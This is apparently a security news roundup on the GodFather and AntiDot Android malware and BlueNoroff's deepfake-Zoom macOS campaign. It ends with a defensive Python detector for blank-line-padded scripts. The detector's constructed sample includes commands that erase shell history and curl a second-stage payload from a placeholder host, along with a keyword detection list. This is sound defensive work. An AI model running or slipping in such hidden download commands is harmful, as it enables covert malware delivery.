UPDATE: Godfather Android Trojan Uses Virtual Sandbox to Hijack Real Banking and Crypto Apps
The latest version of the GodFather Android trojan marks a serious escalation in mobile malware by deploying a full virtualization framework directly on infected devices. Unlike traditional banking trojans that rely on fake login screens or overlays, this version creates a contained virtual environment in which actual copies of the user's apps are run and monitored. Once the device is infected, GodFather scans for installed banking and cryptocurrency applications, builds a cached list of targets, and uses that list to spin up virtualized instances of those apps. When users try to open their banking app, they are unknowingly redirected to a fully functional copy running in the sandbox. The user sees the real interface and performs genuine actions, unaware that everything they enter, including logins, transaction details, and credentials, is intercepted in real time by the malware. This technique is built on several open-source components, including VirtualApp, XposedInstaller, XposedBridge, and Xposed, which together provide app virtualization and dynamic control over running apps. GodFather uses a host app that loads and executes the targeted applications inside a virtual filesystem. From there, attackers gain full visibility into user actions and can remotely alter app behavior at runtime, bypassing security checks or modifying responses. Because the virtualized apps are unaltered and fully functional, users have no visual cues that they are being manipulated. The malware further evades detection by modifying the ZIP structure of its APK files and rewriting the Android Manifest layout to confuse static analysis tools. It continues to abuse Android's accessibility services to obtain the permissions it needs, often tricking users through social engineering prompts. Zimperium researchers also observed the malware attempting to capture device lock screen credentials, including passwords, PINs, and unlock patterns.
While attacks have so far been concentrated on Turkish financial institutions, the malware is equipped to target nearly 500 applications globally across finance, e-commerce, communication, and social platforms, making this an emerging threat with the potential for widespread damage.
AntiDot Android Botnet Grants Full Device Control Through Sophisticated MaaS Framework
AntiDot is a newly discovered Android botnet malware that combines a loader, packer, and command-and-control infrastructure into a single malware-as-a-service (MaaS) platform. Operated by a threat actor known as LARVA-398 and sold on underground forums such as XSS, AntiDot is designed to give cybercriminals full remote access to infected devices. The malware is distributed through phishing campaigns and malicious ads, typically disguised as fake update apps. Once installed, it tricks users into granting accessibility permissions using a fake loading screen, then dynamically unpacks an encrypted payload that activates its botnet functions. With WebSocket-based C2 communication, AntiDot enables real-time control, including screen recording, SMS interception, and overlay attacks that mimic legitimate banking and crypto apps to steal credentials. So far, researchers have tracked over 3,700 infections across 273 targeted campaigns. The malware's control panel, built with MeteorJS, provides attackers with a live dashboard showing victim details and offering specific commands such as "startVnc" for screen viewing and "overlay_pin" to capture device unlock credentials. AntiDot sets itself as the default SMS app to intercept messages and uses Android's accessibility services to simulate user behavior while hiding notifications to stay undetected. It also employs heavy obfuscation, ZIP structure tampering, and Android Manifest manipulation to bypass security tools. Campaign identifiers follow structured naming conventions, pointing to a well-organized operation with global reach. While some cybercriminals have criticized the developer for limited support and outdated compatibility, the malware's ability to silently hijack user sessions, steal data, and control devices in real time makes it a serious and growing threat in the mobile malware landscape.
North Korean Threat Actors Leverage Deepfakes and Zoom Impersonation to Deploy Sophisticated macOS Malware
The North Korean APT group BlueNoroff has executed a highly targeted macOS malware campaign that leverages deepfake technology and impersonation during Zoom meetings to compromise enterprise environments. According to Huntress, the operation began with the threat actors initiating contact via Telegram, posing as external business partners, and sending a fake Calendly link that redirected victims to a spoofed Zoom domain under their control. During the virtual meeting, victims were shown AI-generated deepfake videos impersonating senior executives from their own organization to establish trust. A staged microphone issue then served as the pretext for delivering a malicious AppleScript file disguised as a Zoom extension. Padded with thousands of blank lines to hide its payload, the script appeared benign by opening a legitimate Zoom SDK webpage while executing a concealed command to download a secondary payload. The script also disabled bash history, checked for Rosetta 2 (installing it if necessary), and retrieved additional malware from attacker-controlled infrastructure. The payload consisted of several custom macOS implants, each designed for persistence, surveillance, or credential theft. Telegram 2, a Nim-based component signed with a valid Telegram certificate, served as the primary persistence mechanism. Root Troy V4, written in Go, provided command-and-control functionality, including remote code execution and payload management. InjectWithDyld functioned as a second-stage loader, decrypting implants using a password-derived AES key and performing process injection while wiping its traces after execution. XScreen (keyboardd) enabled continuous monitoring through keylogging, screen recording, and clipboard capture, while CryptoBot (airmond) targeted over 20 cryptocurrency wallet platforms, exfiltrating sensitive financial data. This campaign underscores a growing shift in APT operations toward macOS environments, combining advanced social engineering with modular malware frameworks.
The use of deepfakes in live interactions, combined with tailored payloads and stealthy execution methods, highlights the increasing sophistication of state-sponsored threat actors and the critical need for enterprise macOS defenses to evolve accordingly.
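As an added, defensive example that is not taken from the Huntress report: a small Python heuristic that flags a script file whose executable content sits behind a long run of blank lines, run over a constructed sample; the URLs, the indicator list and the 500-line threshold are assumptions.

```python
# Constructed sample (not from the report): a benign-looking first line,
# thousands of blank lines, then commands a padded script would hide.
SAMPLE_SCRIPT = (
    'open location "https://developers.zoom.us/docs/"\n'
    + "\n" * 3000
    + 'do shell script "unset HISTFILE; softwareupdate --install-rosetta --agree-to-license"\n'
    + 'do shell script "curl -s -o /tmp/stage2 https://placeholder.invalid/stage2"\n'
)

# Tokens worth an alert when they appear only after a long blank-line run.
# Assumed list; tune to your environment.
SUSPICIOUS = ("do shell script", "curl", "HISTFILE", "--install-rosetta")


def longest_blank_run(lines):
    """Return (length, index_of_last_blank_line) for the longest run of blank lines."""
    best = cur = 0
    best_end = -1
    for i, line in enumerate(lines):
        if line.strip() == "":
            cur += 1
            if cur > best:
                best, best_end = cur, i
        else:
            cur = 0
    return best, best_end


def analyze(script_text, min_blank_run=500):
    """Flag a script whose suspicious commands follow an unusually long blank-line run.

    Returns the longest blank run, the 1-based line numbers (with matched tokens)
    of suspicious lines after that run, and an overall verdict.
    """
    lines = script_text.splitlines()
    run, end = longest_blank_run(lines)
    hidden = []
    if run >= min_blank_run:
        for i in range(end + 1, len(lines)):
            hits = [tok for tok in SUSPICIOUS if tok in lines[i]]
            if hits:
                hidden.append((i + 1, hits))
    return {
        "blank_run": run,
        "hidden_lines": hidden,
        "suspicious": run >= min_blank_run and bool(hidden),
    }
```

A short script with a few blank lines and an ordinary shell call is not flagged, so the rule triggers on the padding pattern rather than on the presence of `do shell script` alone.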